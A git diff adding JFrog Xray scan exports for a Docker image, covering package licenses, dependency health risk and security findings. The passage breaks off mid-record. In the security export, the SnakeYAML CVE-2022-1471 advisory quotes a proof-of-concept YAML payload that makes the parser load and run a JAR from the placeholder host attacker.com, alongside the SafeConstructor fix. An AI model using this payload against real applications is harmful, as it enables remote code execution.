"deb://ubuntu:bionic:sed", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:sensible-utils:0.0.12", + "component_name": "ubuntu:bionic:sensible-utils", + "version": "0.0.12", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:sensible-utils", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:sysvinit-utils:2.88dsf-59.10ubuntu1", + "component_name": "ubuntu:bionic:sysvinit-utils", + "version": "2.88dsf-59.10ubuntu1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:sysvinit-utils", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:tar:1.29b-2ubuntu0.4", + "component_name": "ubuntu:bionic:tar", + "version": "1.29b-2ubuntu0.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:tar", + "licenses": [ + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:tzdata:2023c-0ubuntu0.18.04", + "component_name": "ubuntu:bionic:tzdata", + "version": "2023c-0ubuntu0.18.04", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:tzdata", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "ubuntu:bionic:ubuntu-keyring:2018.09.18.1~18.04.2", + "component_name": "ubuntu:bionic:ubuntu-keyring", + "version": "2018.09.18.1~18.04.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:ubuntu-keyring", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:util-linux:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:util-linux", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:util-linux", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:zlib1g:1:1.2.11.dfsg-0ubuntu2.2", + "component_name": "ubuntu:bionic:zlib1g", + "version": "1:1.2.11.dfsg-0ubuntu2.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:zlib1g", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + } +] diff --git a/Docker_07f669c_Operational_risk_Export.json b/Docker_07f669c_Operational_risk_Export.json new file mode 100755 index 000000000..ef2b1a787 --- /dev/null +++ b/Docker_07f669c_Operational_risk_Export.json @@ -0,0 +1,722 @@ +[ + { + "component": "jakarta.transaction:jakarta.transaction-api", + "version_in_use": "2.0.1", + "risk": "Low", + "risk_reason": "Version Age", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.0.1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "jakarta.xml.bind:jakarta.xml.bind-api", + "version_in_use": "4.0.0", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "4.0.1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.latencyutils:LatencyUtils", + "version_in_use": "2.0.3", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.0.3", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-aop", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-aspects", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-tx", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.apache.tomcat.embed:tomcat-embed-el", + "version_in_use": "10.1.12", + "risk": "Medium", + "risk_reason": "Number of new versions", + "is_eol": null, + "released": "2023-08-08T19:51:00Z", + "latest_version": "11.0.0-M12", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.slf4j:jul-to-slf4j", + "version_in_use": "2.0.7", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.0.9", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-orm", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.unbescape:unbescape", + "version_in_use": "1.1.6.RELEASE", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "1.1.6.RELEASE", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.fasterxml.jackson.datatype:jackson-datatype-jsr310", + "version_in_use": "2.15.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-05-30T23:45:35Z", + "latest_version": "2.15.3", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.hibernate.orm:hibernate-core", + "version_in_use": "6.2.7.Final", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-20T19:13:00Z", + "latest_version": "6.3.1.Final", + "cadence": 2, + "committers": null, + "commits": null + }, + { + "component": "org.slf4j:slf4j-api", + "version_in_use": "2.0.7", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.0.9", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-core", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:54:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.fasterxml.jackson.core:jackson-databind", + "version_in_use": "2.15.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-05-30T23:27:37Z", + "latest_version": "2.15.3", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.antlr:antlr4-runtime", + "version_in_use": "4.10.1", + "risk": "Low", + "risk_reason": "Number of new versions and Version Age", + "is_eol": null, + "released": "2022-04-15T21:46:00Z", + "latest_version": "4.13.1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.aspectj:aspectjweaver", + "version_in_use": "1.9.20", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-16T06:41:25Z", + "latest_version": "1.9.20.1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-jdbc", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:54:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.yaml:snakeyaml", + "version_in_use": "1.33", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.2", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "net.bytebuddy:byte-buddy", + "version_in_use": "1.14.6", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-14T19:43:00Z", + "latest_version": "1.14.9", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.google.errorprone:error_prone_annotations", + "version_in_use": "2.21.1", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-04T21:37:00Z", + "latest_version": "2.22.0", + "cadence": 3, + "committers": null, + "commits": null + }, + { + "component": "jakarta.annotation:jakarta.annotation-api", + "version_in_use": "2.1.1", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.1.1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "javax.cache:cache-api", + "version_in_use": "1.1.1", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "2019-05-10T06:07:00Z", + "latest_version": "1.1.1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.apache.tomcat.embed:tomcat-embed-websocket", + "version_in_use": "10.1.12", + "risk": "Medium", + "risk_reason": "Number of new versions", + "is_eol": null, + "released": "2023-08-08T19:51:00Z", + "latest_version": "11.0.0-M12", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework.data:spring-data-commons", + "version_in_use": "3.1.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-18T12:12:00Z", + "latest_version": "3.1.4", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-context-support", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 5, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-web", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:54:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "jakarta.persistence:jakarta.persistence-api", + "version_in_use": "3.1.0", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "3.1.0", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "jakarta.validation:jakarta.validation-api", + "version_in_use": "3.0.2", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "3.0.2", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.apache.logging.log4j:log4j-to-slf4j", + "version_in_use": "2.20.0", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "3.0.0-alpha1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.hibernate.common:hibernate-commons-annotations", + "version_in_use": "6.0.6.Final", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "6.0.6.Final", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.fasterxml.jackson.core:jackson-core", + "version_in_use": "2.15.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-05-30T22:17:00Z", + "latest_version": "2.15.3", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "jakarta.activation:jakarta.activation-api", + "version_in_use": "2.1.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.1.2", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework.data:spring-data-jpa", + "version_in_use": "3.1.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-18T12:14:00Z", + "latest_version": "3.1.4", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-beans", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-context", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:54:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-jcl", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.webjars.npm:font-awesome", + "version_in_use": "4.7.0", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "2017-09-30T12:24:34Z", + "latest_version": "4.7.0", + "cadence": 0, + "committers": 1, + "commits": 3 + }, + { + "component": "io.micrometer:micrometer-observation", + "version_in_use": "1.11.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-14T22:58:00Z", + "latest_version": "1.11.5", + "cadence": 3, + "committers": null, + "commits": null + }, + { + "component": "org.eclipse.angus:angus-activation", + "version_in_use": "2.0.1", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-04-27T13:21:42Z", + "latest_version": "2.0.1", + "cadence": 3, + "committers": null, + "commits": null + }, + { + "component": "org.springframework.boot:spring-boot-jarmode-layertools", + "version_in_use": "3.1.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-24T10:23:54Z", + "latest_version": "3.1.4", + "cadence": 7, + "committers": null, + "commits": null + }, + { + "component": "com.fasterxml.jackson.datatype:jackson-datatype-jdk8", + "version_in_use": "2.15.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-05-30T23:45:31Z", + "latest_version": "2.15.3", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.sun.istack:istack-commons-runtime", + "version_in_use": "4.1.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "4.2.0", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "jakarta.inject:jakarta.inject-api", + "version_in_use": "2.0.1", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "2021-10-16T18:56:00Z", + "latest_version": "2.0.1.MR", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-expression", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:54:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.webjars.npm:bootstrap", + "version_in_use": "5.2.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2022-11-23T02:00:00Z", + "latest_version": "5.3.2", + "cadence": 3, + "committers": null, + "commits": null + }, + { + "component": "com.fasterxml.jackson.module:jackson-module-parameter-names", + "version_in_use": "2.15.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-05-30T23:45:37Z", + "latest_version": "2.15.3", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.h2database:h2", + "version_in_use": "2.1.214", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "2022-06-14T18:50:00Z", + "latest_version": "2.2.224", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "io.micrometer:micrometer-commons", + "version_in_use": "1.11.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-14T22:58:00Z", + "latest_version": "1.11.5", + "cadence": 3, + "committers": null, + "commits": null + }, + { + "component": "org.hdrhistogram:HdrHistogram", + "version_in_use": "2.1.12", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "2.1.12", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.springframework:spring-webmvc", + "version_in_use": "6.0.11", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-07-13T08:53:00Z", + "latest_version": "6.0.13", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.fasterxml.jackson.core:jackson-annotations", + "version_in_use": "2.15.2", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-05-30T20:34:00Z", + "latest_version": "2.15.3", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "io.micrometer:micrometer-core", + "version_in_use": "1.11.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2023-08-14T22:58:00Z", + "latest_version": "1.11.5", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "io.smallrye:jandex", + "version_in_use": "3.0.5", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2022-12-02T15:07:00Z", + "latest_version": "3.1.5", + "cadence": 4, + "committers": null, + "commits": null + }, + { + "component": "org.apache.tomcat.embed:tomcat-embed-core", + "version_in_use": "10.1.12", + "risk": "Medium", + "risk_reason": "Number of new versions", + "is_eol": null, + "released": "2023-08-08T19:50:00Z", + "latest_version": "11.0.0-M12", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.fasterxml:classmate", + "version_in_use": "1.5.1", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "1.6.0", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "com.zaxxer:HikariCP", + "version_in_use": "5.0.1", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "5.0.1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "org.apache.logging.log4j:log4j-api", + "version_in_use": "2.20.0", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "0001-01-01T00:00:00Z", + "latest_version": "3.0.0-alpha1", + "cadence": 0, + "committers": null, + "commits": null + }, + { + "component": "bootstrap", + "version_in_use": "5.2.3", + "risk": "None", + "risk_reason": "None", + "is_eol": null, + "released": "2022-11-22T07:47:10Z", + "latest_version": "5.3.0-alpha3", + "cadence": 9, + "committers": null, + "commits": null + }, + { + "component": "font-awesome", + "version_in_use": "4.7.0", + "risk": "High", + "risk_reason": "Health", + "is_eol": null, + "released": "2016-10-24T21:33:40Z", + "latest_version": "4.7.0", + "cadence": 0, + "committers": null, + "commits": null + } +] diff --git a/Docker_07f669c_Security_Export.json b/Docker_07f669c_Security_Export.json new file mode 100755 index 000000000..6119f1a63 --- /dev/null +++ b/Docker_07f669c_Security_Export.json @@ -0,0 +1,840 @@ +{ + "total_count": 12, + "data": [ + { + "id": "XRAY-262821", + "severity": "Critical", + "severity_source": "CVSS V3 from NVD", + "pkg_type": "maven", + "summary": "SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.", + "issue_type": "security", + "provider": "JFrog", + "component": "org.yaml:snakeyaml", + "source_id": "gav://org.yaml:snakeyaml", + "source_comp_id": "gav://org.yaml:snakeyaml:1.33", + "component_versions": { + "id": "org.yaml:snakeyaml", + "vulnerable_versions": [ + "≤ 1.33" + ], + "fixed_versions": [ + "2.0" + ], + "more_details": { + "cves": [ + { + "cve": "CVE-2022-1471", + "cwe": [ + "CWE-502" + ], + "cvss_v3": "9.8/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "description": "SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.", + "provider": "JFrog" + } + }, + "edited": "2023-01-05T15:59:00Z", + "is_source_root": false, + "is_high_profile": true, + "high_profile_info": { + "Id": 0, + "PublicVulnsTblID": 0, + "VulnId": "XRAY-262821", + "VulnerabilityTitle": "", + "ShortDescription": "A design problem in SnakeYAML leads to remote code execution when deserializing untrusted YAML data.", + "FullDescription": "[SnakeYAML](https://bitbucket.org/snakeyaml/snakeyaml/) is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.\n\nIt was discovered that a crafted YAML file containing a Java `Constructor` can lead to remote code execution due to deserialization.\n\nSnakeYaml's Constructor class, which inherits from SafeConstructor, allows any class type to be deserialized. A ConstructorException is thrown, but only after the malicious\npayload is deserialized.\n\nTo exploit this issue, an attacker must find remote input that propagates into the `Yaml.load()` method. \nThe attacker must deserialize a [Java \"gadget\" class](http://frohoff.github.io/owaspsd-deserialize-my-shorts/) that's available in the application's classpath in order to achieve code execution via the deserialization. However - there are gadget classes that are available by default such as the built-in `javax.script.ScriptEngineManager`.\n\nA remote code execution PoC example, using the Java built-in class `javax.script.ScriptEngineManager`:\n```\nString strYaml = \"!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader \"\n + \"[[!!java.net.URL [\\\"http://attacker.com\\\"]]]]\";;\nYaml yaml = new Yaml(new Constructor(Foo.class));\nyaml.load(strYaml);\n```\nThe PoC will run an arbitrary JAR file supplied from `http://attacker.com`. Note that even though `Constructor` receives a specific class type (`Foo.class`), any gadget class can be deserialized.\n\nNote that the vulnerability will not apply to applications that use the (non-default) `SafeConstructor`", + "Impact": 7, + "VulnerabilityType": "Remote code execution", + "Resolution": "##### Development mitigations\n\nUse the (non-default) `SafeConstructor` class to initialize the `Yaml` class -\n```\nLoaderOptions options = new LoaderOptions();\nYaml yaml = new Yaml(new SafeConstructor(options));\nString strYaml = Files.readString(Path.of(\"input_file\")); \nString parsed = yaml.load(strYaml);\n```\n\nNote that this class will only allow deserialization of [basic types](https://github.com/Thinkofname/snakeyaml/blob/master/src/main/java/org/yaml/snakeyaml/constructor/SafeConstructor.java#L52) such as Integers, Strings, Maps etc.", + "ExtendedImpactReasons": [ + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "Name": "The issue has an exploit published", + "Description": "PoC demonstrates remote code execution.", + "IsPositive": 0, + "InsertOrder": 4 + }, + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "Name": "Exploitation of the issue is only possible when the vulnerable component is used in a specific manner. The attacker has to perform per-target research to determine the vulnerable attack vector", + "Description": "An attacker must find remote input that propagates into the `Yaml.load()` method. The `Yaml` class must be initialized either with no arguments (default initialization) or with a `Constructor` instance. The vulnerability can still be exploited even if the `Constructor` instance is initialized with a specific class type.", + "IsPositive": 1, + "InsertOrder": 1 + }, + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "Name": "The issue results in a severe impact (such as remote code execution)", + "Description": "Remote code execution.", + "IsPositive": 0, + "InsertOrder": 2 + }, + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "Name": "The prerequisites for exploiting the issue are either extremely common or nonexistent (always exploitable)", + "Description": "It is highly likely that SnakeYAML will be used to parse externally-supplied YAML data. In addition, the vulnerability is exploitable when the `Yaml` class is initialized with default arguments.", + "IsPositive": 0, + "InsertOrder": 3 + } + ], + "ExtendedReferences": [ + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "RefType": "Patch", + "Title": "Fixing commit", + "Url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/2b8d47c8bcfd402e7a682b7b2674e8d0cb25e522", + "InsertOrder": 1 + }, + { + "Id": 0, + "PublicVulnsExtendedTblId": 0, + "RefType": "Advisory", + "Title": "GitHub Advisory", + "Url": "https://github.com/advisories/GHSA-mjmj-j48q-9wg2", + "InsertOrder": 2 + } + ], + "ExtendedRelatedVulns": null + }, + "component_physical_paths": [ + "sha256__2547a948987c670df3f6e9575f90adb629f64de0711765dee6fc4c615ee2d120.tar.gz/workspace/BOOT-INF/lib/snakeyaml-1.33.jar" + ] + }, + { + "id": "XRAY-533052", + "severity": "Critical", + "severity_source": "NVD", + "pkg_type": "go", + "summary": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", + "issue_type": "security", + "provider": "JFrog", + "component": "github.com/golang/go", + "source_id": "go://github.com/golang/go", + "source_comp_id": "go://github.com/golang/go:1.19.11", + "component_versions": { + "id": "github.com/golang/go", + "vulnerable_versions": [ + "< 1.20.9", + "1.21.0-0 ≤ Version < 1.21.2" + ], + "fixed_versions": [ + "1.20.9", + "1.21.2" + ], + "more_details": { + "cves": [ + { + "cve": "CVE-2023-39323", + "cwe": [ + "NVD-CWE-noinfo" + ], + "cvss_v3": "9.8/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "description": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", + "provider": "JFrog" + } + }, + "edited": "0001-01-01T00:00:00Z", + "is_source_root": false, + "is_high_profile": false, + "component_physical_paths": [ + "sha256__6b2f3c473f38b33b59e7b51e8ffd3e3e3a32137c664b8490b5699c243dd76ea4.tar.gz/cnb/lifecycle/launcher/github.com/golang/go" + ] + }, + { + "id": "XRAY-533052", + "severity": "Critical", + "severity_source": "NVD", + "pkg_type": "go", + "summary": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", + "issue_type": "security", + "provider": "JFrog", + "component": "github.com/golang/go", + "source_id": "go://github.com/golang/go", + "source_comp_id": "go://github.com/golang/go:1.20.5", + "component_versions": { + "id": "github.com/golang/go", + "vulnerable_versions": [ + "< 1.20.9", + "1.21.0-0 ≤ Version < 1.21.2" + ], + "fixed_versions": [ + "1.20.9", + "1.21.2" + ], + "more_details": { + "cves": [ + { + "cve": "CVE-2023-39323", + "cwe": [ + "NVD-CWE-noinfo" + ], + "cvss_v3": "9.8/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "description": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", + "provider": "JFrog" + } + }, + "edited": "0001-01-01T00:00:00Z", + "is_source_root": false, + "is_high_profile": false, + "component_physical_paths": [ + "sha256__61e0cfcb6f3543ca620b2da9d5e475cb85dd48e92d82e119919ea667f4371a6c.tar.gz/layers/paketo-buildpacks_ca-certificates/helper/helper/github.com/golang/go", + "sha256__133f79a6622aaa0495c72cc6a3b2e8bd35f7e5222ec86d7fea75f1563ee54a68.tar.gz/layers/paketo-buildpacks_bellsoft-liberica/helper/helper/github.com/golang/go", + "sha256__3f5f857a24121a63acf8e6415c9cec7790df50647a8bcb4e0f1278ece3826345.tar.gz/layers/paketo-buildpacks_spring-boot/helper/helper/github.com/golang/go" + ] + }, + { + "id": "XRAY-533304", + "severity": "High", + "severity_source": "NVD", + "pkg_type": "go", + "summary": "The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.", + "issue_type": "security", + "provider": "JFrog", + "component": "golang.org/x/net", + "source_id": "go://golang.org/x/net", + "source_comp_id": "go://golang.org/x/net:0.11.0", + "component_versions": { + "id": "golang.org/x/net", + "vulnerable_versions": [ + "< 0.17.0" + ], + "fixed_versions": [ + "0.17.0" + ], + "more_details": { + "cves": [ + { + "cve": "CVE-2023-44487", + "cwe": [ + "CWE-400" + ], + "cvss_v3": "7.5/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "description": "The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.", + "provider": "JFrog" + } + }, + "edited": "0001-01-01T00:00:00Z", + "is_source_root": false, + "is_high_profile": false, + "component_physical_paths": [ + "sha256__133f79a6622aaa0495c72cc6a3b2e8bd35f7e5222ec86d7fea75f1563ee54a68.tar.gz/layers/paketo-buildpacks_bellsoft-liberica/helper/helper/golang.org/x/net" + ] + }, + { + "id": "XRAY-261922", + "severity": "High", + "severity_source": "NVD", + "pkg_type": "maven", + "summary": "** DISPUTED ** The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify 